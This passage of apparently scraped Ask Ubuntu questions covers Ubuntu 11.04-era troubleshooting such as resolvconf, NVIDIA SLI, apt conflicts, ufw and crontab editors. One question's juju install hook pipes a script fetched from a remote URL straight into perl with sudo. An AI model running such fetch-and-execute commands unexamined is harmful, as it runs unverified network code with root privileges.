binfmt_misc 6587 1 ppdev 5259 0 snd_hda_intel 22069 0 snd_hda_codec 74201 3 snd_hda_codec_nvhdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 5412 1 snd_hda_codec snd_pcm_oss 35308 0 snd_mixer_oss 13746 1 snd_pcm_oss snd_pcm 70694 3 snd_hda_intel , snd_hda_codec , snd_pcm_oss snd_seq_dummy 1338 0 snd_seq_oss 26722 0 snd_seq_midi 4557 0 snd_rawmidi 19056 1 snd_seq_midi snd_seq_midi_event 6003 2 snd_seq_oss , snd_seq_midi snd_seq 47263 6 snd_seq_dummy , snd_seq_oss , snd_seq_midi , snd_seq_midi_event snd_timer 19098 2 snd_pcm , snd_seq snd_seq_device 5700 5 snd_seq_dummy , snd_seq_oss , snd_seq_midi , snd_rawmidi , snd_seq video 17375 0 output 1871 1 video snd 54244 12 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm_oss , snd_mixer_oss , snd_pcm , snd_seq_oss , snd_rawmidi , snd_seq , snd_timer , snd_seq_device lp 7028 0 psmouse 63677 0 serio_raw 3978 0 shpchp 28835 0 i2c_nforce2 5199 0 soundcore 6620 1 snd snd_page_alloc 7076 2 snd_hda_intel , snd_pcm parport 32635 2 ppdev , lp usbhid 36110 0 hid 67288 1 usbhid r8169 34140 0 mii 4381 1 r8169 ahci 32360 2
54888	resolvconf -u gives the error `` resolvconf : error : /etc/resolv.conf must be a symlink ''	i use resolvconf to have static dns servers set in /etc/resolv.conf . however , when i run sudo resolvconf -u to update /etc/resolv.conf with new static information , i get the error 'resolvconf : error : /etc/resolv.conf must be a symlink ' . how can i fix this ?
54891	ubuntu not booting/freeze at startup	ubuntu 11.04 is not booting up with the following error message at startup /device/sda2 is not ready or not present ... /device/sdc2 is not ready or not present ... then the screen just hangs . /device/sda2 is a partition that doesnt even exist in my system as far as i know . /sdc2 is a ntfs partition . tia ! //edit so apparently , i am having problems with the mounting table , but i ca n't access it cause ubuntu is down . i 've tried editing 'fstab ' using a livecd , but it 's not showing the proper mounting table . if someone can point me in the right direction , that would be great .
54895	poor sli performance	i 'm running ubuntu 11.04 x86_64 2.6.38-10-generic . i have two gtx 460s , and i 'm using nvidia driver 270.41.06 . without sli enabled , the computer runs fine . however , after running nvidia-xconfig -- sli=auto and rebooting , performance drops . when i do anything , even as simple as scrolling a webpage , it 's choppy and the cards get excessively hot ( in the red in nvidia x server settings ) . in windows 7 , this is n't a problem ( making this even more annoying ) . sli does seem to be `` working '' , as nvidia-xconfig -- query-gpu-info shows both cards attached to the screen in sli . any ideas ? here is my xorg.conf : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 270.41.06 ( buildmeister @ swio-display-x86-rhel47-08.nvidia.com ) mon apr 18 15:14:00 pdt 2011 # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 270.29 ( buildd @ allspice ) fri feb 25 14:42:07 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` ancor communications inc ve228 '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 460 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' option `` sli '' `` auto '' subsection `` display '' depth 24 endsubsection endsection here is everything after running nvidia-xconfig -a -- sli=auto . it runs the same and i believe the gpu-query-info is the same as before . xorg.conf # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 275.19 ( buildmeister @ swio-display-x86-rhel47-07.nvidia.com ) tue jul 12 18:35:38 pdt 2011 # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 270.29 ( buildd @ allspice ) fri feb 25 14:42:07 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 460 '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 460 '' busid `` pci:3:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` sli '' `` auto '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` sli '' `` auto '' subsection `` display '' depth 24 endsubsection endsection lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation gf104 [ geforce gtx 460 ] ( rev a1 ) 03:00.0 vga compatible controller : nvidia corporation gf104 [ geforce gtx 460 ] ( rev a1 ) sudo nvidia-xconfig -- query-gpu-info number of gpus : 2 gpu # 0 : name : geforce gtx 460 pci busid : pci:1:0:0 number of display devices : 1 display device 0 ( dfp-0 ) : edid name : ancor communications inc ve228 minimum horizsync : 30.000 khz maximum horizsync : 83.000 khz minimum vertrefresh : 50 hz maximum vertrefresh : 76 hz maximum pixelclock : 170.000 mhz maximum width : 1920 pixels maximum height : 1080 pixels preferred width : 1920 pixels preferred height : 1080 pixels preferred vertrefresh : 60 hz physical width : 480 mm physical height : 270 mm gpu # 1 : name : geforce gtx 460 pci busid : pci:3:0:0 number of display devices : 1 display device 0 ( dfp-0 ) : edid name : ancor communications inc ve228 minimum horizsync : 30.000 khz maximum horizsync : 83.000 khz minimum vertrefresh : 50 hz maximum vertrefresh : 76 hz maximum pixelclock : 170.000 mhz maximum width : 1920 pixels maximum height : 1080 pixels preferred width : 1920 pixels preferred height : 1080 pixels preferred vertrefresh : 60 hz physical width : 480 mm physical height : 270 mm edit : i updated to 275.19 , no change . edit : ended up selling the second one . problem solved i guess .
54900	what do `` . '' and `` .. '' mean when in a folder ?	when i used ls -a to view hidden files in folder there were 2 hidden files created by default what is the significance of this two files . and .. ? ls -a produces . ..
54902	how do you mount network drives ?	when i access a network folder using nautilus it shows up in the places sidebar , but not in any other application 's save/open places sidebar . why the inconsistency , and how can i add a share so every application has access to it without having to edit fstab ?
54904	unzip error `` end-of-central-directory signature not found ''	i try to unzip a zip file , but got an error : $ unzip cocr2_100.zip archive : cocr2_100.zip end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . note : cocr2_100.zip may be a plain executable , not an archive unzip : can not find zipfile directory in one of cocr2_100.zip or cocr2_100.zip.zip , and can not find cocr2_100.zip.zip , period . i googled but did n't find a solution . i was wondering why it is and how i should fix it ? thanks ! the zip file can be downloaded from cocr2_100 . it is an application , and here is its website http : //users.belgacom.net/chardic/cocr2.html . my os is 10.10 .
54908	which gmail notifier do you use ?	there are plenty of them . which one would you recommend ? is there one which notifies about unread buzz posts ?
54921	broken software index , what do i do	i tried to install libboost and it failed . now i 'm getting the error that there are unmet dependencies and i can not do anything involving upgrading or installing packages . i run sudo apt-get -f install as recommended in the messages but i get the errors root @ im-epi140 : ~ # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libboost1.42-dev suggested packages : libboost1.42-doc libboost-date-time1.42-dev libboost-filesystem1.42-dev libboost-graph1.42-dev libboost-iostreams1.42-dev libboost-math1.42-dev libboost-program-options1.42-dev libboost-python1.42-dev libboost-regex1.42-dev libboost-serialization1.42-dev libboost-signals1.42-dev libboost-system1.42-dev libboost-thread1.42-dev libboost-wave1.42-dev docbook-xsl fop the following new packages will be installed : libboost1.42-dev 0 upgraded , 1 newly installed , 0 to remove and 28 not upgraded . 2 not fully installed or removed . need to get 0 b/6,624 kb of archives . after this operation , 68.9 mb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : regarding ... /libboost1.42-dev_1.42.0-4ubuntu2_amd64.deb containing libboost1.42-dev : libboost1.42-dev conflicts with libboost-dev ( < < 1.35.0 ) libboost-dev : i386 ( version 1.34.1-15ubuntu3 ) is present and unpacked but not configured . dpkg : error processing /var/cache/apt/archives/libboost1.42-dev_1.42.0-4ubuntu2_amd64.deb ( -- unpack ) : conflicting packages - not installing libboost1.42-dev errors were encountered while processing : /var/cache/apt/archives/libboost1.42-dev_1.42.0-4ubuntu2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i fix this ?
54926	multi sound volume like windows	there is good feature in windows ( for me : -d ) : when using headset you can set volume of output sound to something other than when you 're not ! e.g i set the sound volume to minimum when i 'm not using headset but when using that 's very high . but there is no such feature in ubuntu ! now is there any program or solution for ubuntu ?
54932	gigaware wireless-n usb 2.0 adapter stopped working , missing firmware	when i first installed 11.04 on my gateway ml6720 my gigaware worked fine my son pull out the usb and now i get firmware missing when i try to get online . my internal wireless works fine but i now ca n't go far from the house . is there a way around this or do i have to reinstall the os ?
54950	how can i programatically determine which ubuntu versions are still supported ?	i was writing a script and needed a list of all currently supported versions of ubuntu . if any of you guys know of either a downloadable files which contains all versions with dates or a simple list of all currently supported versions . that would be great . obviously they would have to be locations where canonical keeps them up to date so the scripts continue to work into the future . and it should be something which works on older versions of ubuntu , say any supported version ( lucid+ ) etc .
54951	if i 've signed the canonical contributors agreement , do i have to sign the new harmony agreement ?	the contributors agreement has changed to a broad license harmony agreement . do i need to resign the new agreement or is it automatic . does anything prevent me from signing the new agreement and using that as a basis for my contributions and should i sign the new agreement , is it legally safer ? note , i have personally never signed the old canonical agreement , this question is from other members of the community .
54959	what should i do when some users can see my ntfs drives , and others ca n't ?	hi i have two ntfs drive partitions that i want to be able to access from either windows or ubuntu 10.04 , and it works fine ... from my account . when any of the other ubuntu accounts are logged in , they ca n't see the drives . they are invisible to other users both before and after i mount them in my account . i looked at the permissions tab for the drives and it says the permissions can not be determined . maybe that 's normal for a windows drive , i do n't know . i tried searching for an answer but it i ca n't find anybody else that asked the same thing . what should i do ? thanks for any help .
54960	how do i set up an email server ?	my vps is running ubuntu , and i 'd like to be able to receive email to my domain . how do i easily set up a mail server to do this ?
54963	alsa mixer query ?	opened the terminal ran alsamixer , held the right arrow key till i could encounter beep mixer , but was unable to find beep gui . does this mean beep is not installed or it has not been invoked or any other scenario ? thank you in advance .
54964	ubuntu compatible motherboard with onboard graphics card	can anyone recommend linux compatible motherboard , with : hassle free installation ( i boot ubuntu , install it , and it 's working . i 'm not required to patch any kernel , or installing additional software ) . acpi working out of the box . including hibernation . minimal on board gpu , working out of the box . to allow interfaces like unity/compiz . goes without saying , networking and audio should work out of the box . ( i do n't mind ubuntu fetching propriety drivers , but i need that to be hassle free . i click install , next-next-next , and everything is working , drivers are fetched from manufacturer 's website , kernel module is pushed , etc , etc . )
54965	change listview row color in elementary nautilus ?	how to style the rows color in elementary nautilus ( list view ) ?
54966	ubuntu one music listen offline on ipod touch	https : //one.ubuntu.com/downloads/iphone/ '' listen offline and enjoy your favorite songs '' anyone knows how to do that on an ipod touch ? i ca n't see any option for that .
54970	how to set up a loop device at boot time ?	i want to set up a loop device at boot time . i wonder what is the best way to do this . i 've searched for it on google . some says adding a udev rule , some says putting a scripts in /etc/init.d , some even modifies the initramfs . so what is the best or right way to do this ? could you please give some details ( about how to do ) ? thank you .
54971	setting up ufw for a website , i want to to disallow everything except ssh , e-mail , and http	i have read the basic instructions here : https : //help.ubuntu.com/community/ufw i want to sudo ufw default deny and then sudo ufw allow ssh sudo ufw allow smtp sudo ufw allow www sudo ufw allow https sudo ufw allow imaps to allow the services i need , am i missing anything ? i assume allowing ssh will also allow scp ? ( heck i will allow sftp as well anyway ) . however my problem is i am connecting remotely , so the only way i can do what i want is to actually do a sudo ufw default allow then use a list of the services provided by less /etc/services and deny each service individually ? this seems a pain as if i turn on the firewall with default deny it will boot me out of my ssh connection ?
54973	i need mercurial 1.8.x back	i 'm getting mercurial from this ppa : https : //launchpad.net/~mercurial-ppa/+archive/releases/+packages ? field.name_filter=mercurial & field.status_filter= & field.series_filter= the eclipse plugin mercurialeclipse ( former hgeclipse ) does n't work well with version 1.9.0 . how do i downgrade to 1.8.4 ? i tried to follow the instructions here but aptitude versions mercurial only lists 1.9.0 . when i try aptitude install mercurial=1.8.4-0ppa1 , i get : unable to find a version `` 1.8.4-0ppa1 '' for the package `` mercurial '' i 'm on ubuntu 11.04 ( natty ) . [ edit ] note that the official version ( 1.7.5 for natty ) is too old . i need something from the 1.8 range .
54977	remote desktop service in ubuntu one	it would be great if ubuntu one will start provide easy to use remote helper service like teamviewer . new ubuntu users often need help of more experienced users and such just-provide-me-id-and-pass solution could help to populate ubuntu .
54981	how can re-use ubuntu which was installed via wubi on windows 7 ?	for some reason i ca n't install ubuntu from cd or usb , so that i had to installed ubuntu via wubi . but i install ubuntu into partition 'd ' and partition of win 7 is 'c ' . if i re-install win 7 , how can i use pre-installed ubuntu ?
54988	how to cross-compile an existing deb package from 64bit to 32bit architecture	i have rebuilt a deb package with a custom patch for my computer which is a 64bit machine . i did it using : sudo apt-get -b source [ package name ] now my question is , how to do that in a similar manner to cross-compile the same package for 32bit machines ? thanks , nicolay
54989	how do i use a usb joystick to generate midi data to control audio apps ?	i 've read about people hacking joysticks to make a foot controller for audio apps by wiring up some robust switches to the circuit board . it 's probably possible to do something with the joystick too . i 'm just wondering how you would convert this to midi as i assume this is what the apps will expect . or can you map the switches to keyboard commands for similar effect ?
54991	logout from ubuntu one android app	how can i logout from the ubuntu one files apps on android ? is it possible to have a login screen everytime i star the application ? if i lose my phone , someone can just upload or download from my account because the ubuntu one app seems like always logged in . is there any way to logout ? ? thanks . andy .
54992	how to add user without useradd command ?	is it possible to add a user in ubuntu linux without useradd command i think its possible by adding the entries in /etc/passwd and /etc/shadow but i do n't know the exact steps to do it and the user should get its home directory and bash shell too .
54994	force alt+tab show only active desktop apps in gnome-shell	i 'm using gnome shell . alt+tab shows all opened application windows from all virtual desktops . it becomes impossible to use when many windows are opened . is it possible to show only these apps which are on active desktop ?
54995	dynamic line wrapping in the gnome terminal	how can you get the lines in the gnome terminal to wrap dynamically when you resize the window ?
54999	enable hdmi audio for an nvidia card	i am using a gtx470 with an hdmi output , this card is able to handle the video and audio . i have no issues with the video but i get no sound . is there a guide to enable sound on this card through hdmi that could be written out or i could be guided to . thanks !
55000	kget , skype , and vuze are not showing up in my panel	i have been having trouble with unity . kget , skype and vuze all give me the same problem . i can launch them once and after that if i close the window i wo n't be able to get the application back . killing the process and opening again is the way around i found . but i want to find if it 's possible to fix it . i do n't even get the notification icon for vuze and skype . how do i get them . if i get them i most probably be able to access the still running but hidden applications . my com.canonical.unity.panel looks like this : [ 'javaembeddedframe ' , 'mumble ' , 'wine ' , 'skype ' , 'hp-systray ' , 'scp-dbus-service ' ]
55003	how can i use vmbuilder to install the dev ubuntu release ?	i 'd like to try some packaging for oneric and vmbuilder seems like the easiest way to install it in kvm , but when i tell vmbuilder to install oneric it says it only knows through natty . jrwren @ delays : { 4 } ~ $ sudo vmbuilder kvm ubuntu -- suite oneric 2011-07-29 11:16:30,578 info : calling hook : preflight_check 2011-07-29 11:16:30,579 info : cleaning up 2011-07-29 11:16:30,579 error : invalid suite : `` oneric '' . valid suites are : dapper gutsy hardy intrepid jaunty karmic lucid maverick natty traceback ( most recent call last ) : file `` /usr/bin/vmbuilder '' , line 24 , in < module > cli.main ( ) file `` /usr/lib/python2.7/dist-packages/vmbuilder/contrib/cli.py '' , line 216 , in main distro.build_chroot ( ) file `` /usr/lib/python2.7/dist-packages/vmbuilder/distro.py '' , line 81 , in build_chroot self.call_hooks ( 'preflight_check ' ) file `` /usr/lib/python2.7/dist-packages/vmbuilder/distro.py '' , line 67 , in call_hooks call_hooks ( self , *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/vmbuilder/util.py '' , line 165 , in call_hooks getattr ( context , func , log_no_such_method ) ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/vmbuilder/plugins/ubuntu/distro.py '' , line 100 , in preflight_check raise vmbuilderusererror ( 'invalid suite : `` % s '' . valid suites are : % s ' % ( suite , ' '.join ( self.suites ) ) ) vmbuilder.exception.vmbuilderusererror : invalid suite : `` oneric '' . valid suites are : dapper gutsy hardy intrepid jaunty karmic lucid maverick natty
55011	does opera work with the global application menu ?	i’m curious… is there a way to get opera working with the global menu ? that would be very nice if it could .
55016	how to run multiple versions ( via multiple profiles ) of firefox ?	i downloaded three versions of firefox : 3.6 , 3.5 and 3.0 from mozilla ftp server . then i created three profiles , e.g : firefox -no-remote -createprofile firefox-3.5 then iâ tried to run it : ./firefox -no-remote -p firefox-3.5 but it failed with the error : ./firefox-bin : symbol lookup error : ./libxul.so : undefined symbol : _z19js_obj_definegetterp9jscontextjpi or ( firefox-bin:4034 ) : glib-critical ** : g_hash_table_insert_internal : assertion `hash_table ! = null ' failed actually it worked in 10.10 . i dropped in on mozillaâs firefox irc channel and one dude told me he had never seen this bug before so i suppose that it is natty issue .
55019	recommendations for a backup solution ?	i 'm looking for a backup solution for a specific use case . if none exists , then i 'm tempted to make one . i have a large and growing collection of video files . on my workstation i have a fairly large disk in raid5 , consisting of a few 2tb disks , which is easily expandable . these files are never changed . if i need to edit one , then i create a new file . i use hotswapable 2.5 '' harddisks for backup , which so far i 've done manually . it works , but i 'm afraid of doing anything wrong . i might forget to copy a file , mislabel a disk , etc . i would like a solution that watches the video files on my workstation , automatically copies new files to the current backup disk and presents me with an overview of which backup disk contains which files , descriptions , dates and where those disks are physically stored . it would be nice if i could just insert an unformatted disk and it would be formatted , labeled and tracked automatically . when the free space of a backup disk reaches a certain level , i should be notified so that i can store it safely and replace it with a new one . each backup disk should contain a copy of the current database and thumbnails for the videofiles contained on this disk . for restore , i should be able to simply provide a root directory where the hierarchy should be recreated and it would then tell me to `` insert disk x '' -- like installing windows 95 from floppies . does anyone know of a free backup solution that fits this profile , or should i go ahead and make one ?
55020	ubuntu *sometimes* restarts when i try to shutdown ( shutdown -p now , halt , init 0 )	i have had ubuntu running fine from usb external hd . when i bought a new laptop ( toshiba l775d-s7222 ) and tried to boot i found that not always but sometimes there was a problem that shutdown did not poweroff rather restarted . also when this happens my laptop keyboard and mouse dont work at all and i need to use external . when this happens i sometimes fing in the bios that internal mouse is disabled even though i know clearly that i left it enabled . how can i go about debugging this ? some lines from dmesg : [ 2.770728 ] ehci_hcd 0000:00:16.2 : quirk : enable exception for amd hudson aspm [ 2.770741 ] ehci_hcd 0000:00:16.2 : applying amd sb700/sb800/hudson-2/3 ehci dummy qh workaround [ 3.011495 ] powernow-k8 : found 1 amd a6-3400m apu with radeon ( tm ) hd graphics ( 4 cpu cores ) ( version 2.20.00 ) thanks
55022	changing default crontab editor	i am trying to change the default editor from nano to vim . i have run the following commands : sudo update-alternatives -- config editor and update-alternatives -- config editor both now output : selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /bin/nano 40 auto mode 1 /bin/ed -100 manual mode 2 /bin/nano 40 manual mode * 3 /usr/bin/vim.basic 30 manual mode 4 /usr/bin/vim.tiny 10 manual mode i have restarted my ssh session and restarted sshd but crontab -e still opens in nano what else do i need to do ?
55024	upgrading evolution from source	as with most people i presume i am running evolution 2.32.2 inside 11.04 natty and regardless how annoying the crashes are i prefer it to thunderbird . obviously as soon as 11.10 oneiric is released evolution is being dropped which isnt too much of a problem as i intend to re-install it anyway . now to my question ... i want to upgrade evolution to the latest version ( 3.0.02 ) . i downloaded the tar.bz2 file and a makefile script created by paul smith . the script checks for evolutions dependencies along with some phyton files . i downloaded all of these using sudo apt-get install ( this took me ages ) and continued to run the makefile which simply hangs . the tar does come with an install-sh script which for the life of me i can not run in terminal as sh is not a valid command . i have ./configure which tells me there is a problem with intltool being out of date which it isnt can someone take me through the process of installing from source in ubuntu or tell me an easier way to update evolution . i have checked the depository and 2.32.2 is , according to the list , a current version
55030	dvd station and partitions disappeared , usb sticks are not recognised	after installing ubuntu 11.04 my hhd partitions and dvd station disappeared , in ubuntu 10.10 i had no issues with it . i have issues to with usb flash drives , if i connect my usb stick nothing happens and ubuntu does not show it in the file browser . the below screenshot it taken from my filebrowser where it usually shows the partitions and dvd station :
55032	how to create a new file with content using ubuntu one api and php	i 'm having some problems when i try to create a new file with some content ( or overwrite the content of an existing one ) using ubuntu one api and php . i can easily create and empty file or folder using : put /api/file_storage/v1/~/path/to/volume/path/to/node but i do n't understand ho to use this specification : put /api/file_storage/v1/ + < directory.content_path > + '/ ' + filename.ext , or /api/file_storage/v1/ + < file.content_path > put a new file , with content , in one action , or overwrite content of an existing file . the body of the put request is the content of the file . note that you can not put a new file with content and alter its attributes at the same time . note also that content_paths may not be rooted under the api root , and may change without warning , so they must be read from the api and not hardcoded . ( note caveat above about content_root being temporarily different . ) i do n't post the whole code but only the line which does n't work : $ api_url = 'https : //one.ubuntu.com/api/file_storage/v1/ ' ; $ filecontentent = `` content of the txt file '' ; $ oauth- > fetch ( $ api_url . '~/ubuntu one.'. $ filecontentent . '/try.txt ' , oauth_http_method_put ) ; i do n't understand how to structure the syntax . can you help me ?
55037	how to install on a macbook with a broken optical drive ?	the optical drive of a `` late 2007 '' macbook broke recently . i 'm starting to think that it 's not possible to install linux on this machine via an usb device . i 've installed ubuntu ( still running ) on one of the partitions before . the optical drive was working back then . to no avail , i 've tried all combinations of the following that i can think of : https : //help.ubuntu.com/community/how % 20to % 20install % 20ubuntu % 20on % 20macbook % 20using % 20usb % 20stick http : //userpages.uni-koblenz.de/~ceinig/howto/artikel.php ? id=92 i also tried this a couple of times without success : how to install on a macbook air 3,2 without an external cd drive ? if an usb install is not possible , are there other possibilites ? thanks in advance .
55039	automating linux ( like autohotkey for windows )	what programs are available for linux that can give a context sensitive automation like autohotkey for windows . a few example of things that i would like to do . replace ] d with the current date , when typed . map ctrl+enter to tab , tab , enter when on a chrome browser with google+ . for quick posting . replace a string `` mysig '' with a signature when either gmail is pulled up or when an evolution new mail window has the focus . what options are there for this ? i would really like a program that is independent of all others so that i can have shortcuts and hot-strings map across all programs . i 've really gotten used to the date string and a few others that are very handy .
55040	synchronization of more data , than available online storage	if i have more than 5gb data to synchronize between computers , will ubuntu one be still synchronizing it all correctly between computers , or will i have to upgrade my account ? i do not necessarily need all my data available online .
55042	display problem in cube	i have cube set up and running after a few tries , but when the launcher auto hides , it leaves behind a vertical column in it 's place with lines and hash marks at the top and bottom and just a gray vertical section in the middle . if i push the left side of the screen , the launcher reappears as usual but it always leaves this blank vertical space on the screen . this also appears when the cube is rotated . screenshots : i have tried a bunch of different settings to no avail . what am i missing ? appreciate your help . bill
55044	screen lock ubuntu 11.10	while in ubuntu 11.04 i could disable the lock in screen after suspend this option does n't exist anymore in 11.10. at least in gconfgeditor the option is not available anymore as i dont want to fight to reopen the issue , i just edit the question to include the solution i found : install dconf editor as part of the dconf tools and start the editor via the dash . then navigate to org.gnome.desktop.lockdown and voila
55045	why do i have to shift - right / left key to open and close folders in nautilus , eclipse , etc . ?	in windows , you could navigate tree menus with left/right keys , now in ubuntu 11.04 ( and perhaps previous versions ? ) i have to hold the shift key while i do that , its quite annoying , any way to configure this ? edit : i 've attached a picture indicating the problem : so in windows , with the focus on the circled element , i could tap the `` right key '' and it would open up this folder . in ubuntu , in eclipse , nautilus , etc , i have to hold down shift and the right key to get the same behaviour .
55053	dual monitor : hdmi no signal , not recognized in ubuntu	brand new asus ve247h monitor , connected by vga , is not getting recognized in ubuntu 11.04 . monitor preferences does not recognize a second monitor ( 'unknown ' ) . ati catalyst control administrative does not either ( i can add an external monitor , but nothing actually happens ) . the monitor itself does not recognize ubuntu either and switches into standby after displaying the message 'hdmi no signal ' . running dual install with windows 7 on dell inspiron , 64-bit install , graphics card radeon hd 5000 und driver ati ( fglrx ) . laptop and monitor per se work together on windows 7 ( which my brother uses ) . so the problem is a ubuntu compatibility one . any suggestions ? i always work with ubuntu , i do n't want to have to send the monitor back because ubuntu is making a fuss .
55057	how to improve file access speed ?	my computer is very slow when starting applications . you clearly hear how the hard disk seems to read files from all over the disk . a first idea would be to check for fragmentation ( since the drive is 80 % full ) : sudo e2fsck -fn /dev/sda4 returns as result that it is only 0.6 % fragmented . some further research on the web ( http : //blogs.kde.org/node/2270 ) gives me the impression that linux file systems do not much fragment in the sense of splitting files into pieces , but they spread files in a random order over the disk ( to avoid fragmentation ) . is that true ? is there a way to force the system to place all boot files ( or all files of one application etc . ) in a linear order ?
55060	ca n't start ubuntu 11.04	i shutdown my computer and now i ca n't restart . i had the message below . busybox v1.17.1 ( ubuntu 1:1.17.1-10ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . initramfs ) . i 'm bigner in ubuntu , anybody can help me please ? thanks .
55062	how to setup thunderbird to sign outgoing email messages with my gpg key ?	signing all outgoing email messages sounds like a good idea and i 'm curious to know easy it is to get this set up with thunderbird . what steps do i have to take and what settings do i have to change ?
55065	how to gain a permission for copy/pasting for system folders ?	i 've been using windows os before , and it 's a bit hard for me copying and pasting to ubuntu 's system folders so . if i drag file or folder into file system folders , i 'm getting `` permission denied '' error . is there any way to copy/paste file/folders easily ( not by terminal ) ? thanks in advance
55068	how to add a shortcut for humble bundle games in unity ?	i downloaded some games from the humblebundle , but most of them do n't have deb files . they run fine after extracting them and double clicking on the executable , but unity does n't automatically find them so i ca n't search for them , or add them to the side bar . i tried to drag the executable onto the side bar , but it just dimmed and did n't do anything once i dropped it . i also tried to right-click on the executable in and clicked on `` make link '' , but i could n't drop that onto the side bar either . i would prefer a solution that does not require using the terminal or editing configuration files by hand if possible .
55077	how can i programatically find out which cpan modules relate to packaged modules ?	i am trying to write an juju formula for app : :alice , a web based irc client . according to the the installation instructions i execute the following commands to snag alice and all of it 's dependencies from cpan : curl -l http : //xrl.us/cpanm | perl - -- sudo app : :cpanminus cpanm -- sudo -- installdeps app : :alice i wrote the formula to do this so when it launches an ec2 instance it installs the entire thing , here 's my install hook : # ! /bin/bash debian_frontend=noninteractive sudo apt-get -y install build-essential libnet-ssleay-perl set -eux # -x for verbose logging to juj debug-log curl -l http : //xrl.us/cpanm | perl - -- sudo app : :cpanminus cpanm -- sudo -- installdeps app : :alice the problem is that it took about 10 minutes on an m1.small to snag and build everything from cpan . this is too long to wait , especially if i 'm going to pay for 10 minutes of computing time every time i want to run alice ! so i was thinking if i could install the cpan modules that already exist as packages and add it to the apt-get line that this would save a bunch of time . right away i got an error when using alice that it needed ssl , so i added the libnet-ssleay-perl package to the right line . my problem is that i do n't want to run the install and manually determine which modules it needs , search for it in the archive , and then add it . is there a tool or method that will just enable me to figure out which modules alice needs that are packaged so i can install those from the archive or do i need to go search for each one ?
55078	unity or gnome 3 . what 's more stable to be used ?	i have installed ubuntu 11.04 and i am still a newbee in ubuntu . ubuntu gives me trouble with some apps like - skype , vuzu and kget . so i tried gnome 2 but it 's not much attractive . i wanted to know whether if gnome 3 is much better or will installing gnome 3 break unity and make the system into a mess . i want to have a stable yet attractive ubuntu . so what 's the best to do ? install gnome 3 keep unity and use alternate apps for skype and others
55082	virtualbox firewall issue ?	i have followed this tutorial http : //ubuntuguide.net/enable-remote-desktop-in-virtual-machinevirtualbox-guest and still can not remote into the windows xp desktop i have installed , it tries to connect but times out . i have this running through a home network . my question is , do i need to do anything in terms of firewall settings in ubuntu to allow rdp to work ?
55083	support for thunderbolt connection devices in linux ?	what is the current level of support for intel light peak connection devices in linux ? has anyone seen any of these in a linux system ? http : //www.intel.com/technology/io/thunderbolt/index.htm
55084	deja dup ubuntu one plugin	i know this will be shipped by default in 11.10 , but i was wondering if there is a plugin or addon ( out now ) that will allow me to backup to my ubuntu one account ?
55089	prepend # # to every line in a text file	i want to add hashes to all the lines in a regular text file . i 'm fine with both the use of terminal and guiâi just need to get it done .
55092	phpmyadmin installed but not opening ?	i have ubuntu 11.04 . i installed lamp so i automatically got things like mysql , php , apcahe which are needed for it . it also shows that the phpmyadmin package is installed . but when i go to this : http : //localhost/phpmyadmin it shows page not found ? there is also a user named phpmyadmin there already . how can i open to the phpmyadmin ? thanks ! !
55095	sony vaio vpcy21s1e black screen	i 've seen this post on the linuxmint forums on a laptop model i 'm interested in : http : //forums.linuxmint.com/viewtopic.php ? f=59 & t=77810 i would like to know if anyone got this or similar laptop model working on ubuntu linux ?
